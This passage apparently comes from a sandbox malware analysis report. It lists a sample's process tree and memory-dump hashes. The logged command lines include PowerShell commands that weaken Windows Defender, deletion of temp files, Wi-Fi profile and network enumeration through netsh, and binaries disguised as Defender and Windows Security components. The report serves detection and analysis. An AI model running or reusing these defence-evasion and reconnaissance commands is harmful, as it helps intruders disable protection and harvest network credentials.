                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:52
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:53
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:00:16:10
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:56
                                                  Start time:00:16:10
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:58
                                                  Start time:00:16:14
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x2a0000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:59
                                                  Start time:00:16:26
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x190000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:60
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:61
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:62
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:63
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:64
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:65
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:66
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:67
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:68
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:69
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show profile
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:70
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show profile
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:71
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr All
                                                  Imagebase:0xe40000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:72
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr All
                                                  Imagebase:0xe40000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:73
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:74
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:75
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:76
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:77
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:78
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:79
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show networks mode=bssid
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:80
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show networks mode=bssid
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:82
                                                  Start time:00:16:40
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:83
                                                  Start time:00:16:40
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:84
                                                  Start time:00:16:41
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:85
                                                  Start time:00:16:41
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:87
                                                  Start time:00:16:50
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0x590000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:88
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:89
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:90
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:91
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:92
                                                  Start time:00:17:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x870000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:93
                                                  Start time:00:17:03
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0x2a0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:94
                                                  Start time:00:17:05
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:95
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:96
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:97
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:134
                                                  Start time:00:18:04
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\Conhost.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H
                                                    • API String ID: 0-2852464175
                                                    • Opcode ID: 5802722c928ce9b3205f28f1d37f33bebd8e8067708e32cacf5a308cadb1538a
                                                    • Instruction ID: 4c27b736a3bdceb9be714133cf0389aa9d8a937f4753ec497247b41877ab32b6
                                                    • Opcode Fuzzy Hash: 5802722c928ce9b3205f28f1d37f33bebd8e8067708e32cacf5a308cadb1538a
                                                    • Instruction Fuzzy Hash: 7531786284E3D25FC30367745C764A17FB09E57250B0A44EBD8C4CF4E3D61C699AC726
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b1158b2ef98ae209c80a985420c97e193ca98b279499430fad95ec5e43fee44
                                                    • Instruction ID: 32639db39108b2648a0aa5592e317961bad751352b2446affe0f29a85cdd69e4
                                                    • Opcode Fuzzy Hash: 3b1158b2ef98ae209c80a985420c97e193ca98b279499430fad95ec5e43fee44
                                                    • Instruction Fuzzy Hash: 52614A31F1E9569FE744FB6894A56B9BBF0FF99750F1400BAD408C32C6DE28AC028355
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3fbc92198a052b6e14cd0c510228d7f5e56c61044e27c71f8b01cfbcb9f80d2
                                                    • Instruction ID: 06407a8cd06def9160d6c61151dee9c588e91bb0309f5cc3ab66ab42d9520f26
                                                    • Opcode Fuzzy Hash: d3fbc92198a052b6e14cd0c510228d7f5e56c61044e27c71f8b01cfbcb9f80d2
                                                    • Instruction Fuzzy Hash: 2541CD31E0DA899FE785EB7898692B9BBD1FF59740F0800BBD44DD31D7EA289C458341
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cdff0b345a506b5fb79a81ff26f2754865322ff98f3feb891697dfee7335a9
                                                    • Instruction ID: fb66c9dec05f974153e24b6a87e6f13a8bdae1fbf0972f50858496bd61292140
                                                    • Opcode Fuzzy Hash: 93cdff0b345a506b5fb79a81ff26f2754865322ff98f3feb891697dfee7335a9
                                                    • Instruction Fuzzy Hash: D9715230A189198FEB98FB28D498BADB7E2FF94354F544179E41AD32D1CF38AC418B44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8e1ba6b5ff1d803073217838cc94add454d2d360b3c944c757ce98f35a0d1c8
                                                    • Instruction ID: c5d5126eca2f50d7008413e9b1d28ec793cf59c5bb8c27e9ebf5a8890f3651d9
                                                    • Opcode Fuzzy Hash: d8e1ba6b5ff1d803073217838cc94add454d2d360b3c944c757ce98f35a0d1c8
                                                    • Instruction Fuzzy Hash: E321A131B1994D9FEB94FB3884996BDB7D2EF99745B04007AE40ED3297DE24AC418740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c7cfd7881ee53d2db76be4d0f03138182545dacbfaeedf5a47e74ae0f835ca4
                                                    • Instruction ID: db121888344c382de24e9d7b8c9db1d98b9a9760200bf7df7cf32c367a0686aa
                                                    • Opcode Fuzzy Hash: 5c7cfd7881ee53d2db76be4d0f03138182545dacbfaeedf5a47e74ae0f835ca4
                                                    • Instruction Fuzzy Hash: E9012231E1E9958FE358B77818AA2B4BBD1EFDA780F0900BAD40DC32D7DE185C468341
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4849e93dd4307e404ab46129095d6577c060b5e531059b9bac040d71dbec07b
                                                    • Instruction ID: 056a4f4d1907e38ab3778b1defc59ca0fa320ed032724cdf45d3b7981a32c02d
                                                    • Opcode Fuzzy Hash: f4849e93dd4307e404ab46129095d6577c060b5e531059b9bac040d71dbec07b
                                                    • Instruction Fuzzy Hash: F8F0F431F2E8199FE7A8767D189A2B9A7D6DFE8B90F140039E40DC32D9DE285C424245
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42ab2f12a8faac9978ee77717124a2bf6963995fec731cb8cfa88e88e451d048
                                                    • Instruction ID: dd469b3133fa9896d6bf75a09e998925fb8c80b8e542a562987ed9d4a9eb4100
                                                    • Opcode Fuzzy Hash: 42ab2f12a8faac9978ee77717124a2bf6963995fec731cb8cfa88e88e451d048
                                                    • Instruction Fuzzy Hash: 8F017130B2EA858FD358B728985666833C0EF88750F0009BAC949C72C6DE28EC42C785
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c3f403a952f306d75e845f60630e7dbee160eaa1a07c6b1e371f4b71f7aa145
                                                    • Instruction ID: 2a725b77519808e694ec84a14a017774724c50ab94fe44f20b658f82e1149363
                                                    • Opcode Fuzzy Hash: 7c3f403a952f306d75e845f60630e7dbee160eaa1a07c6b1e371f4b71f7aa145
